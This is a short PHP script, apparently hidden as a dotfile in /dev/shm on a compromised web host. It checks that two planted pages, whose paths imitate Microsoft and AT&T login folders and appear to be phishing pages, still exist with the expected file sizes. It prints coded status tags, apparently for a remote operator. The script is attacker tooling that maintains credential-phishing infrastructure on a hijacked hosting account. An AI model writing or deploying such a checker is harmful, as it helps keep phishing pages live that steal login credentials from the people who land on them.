File: //dev/shm/.val
<?php $r = '/home/who23lookupscom/public_html/_/file/email/file/ico'; $x = ["/_/file/email/file/img/Microsoft/index.php"=>"bd@@98839@@76",
"/_/file/email/file/img/Att/index.php"=>"bd@@98855@@22"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');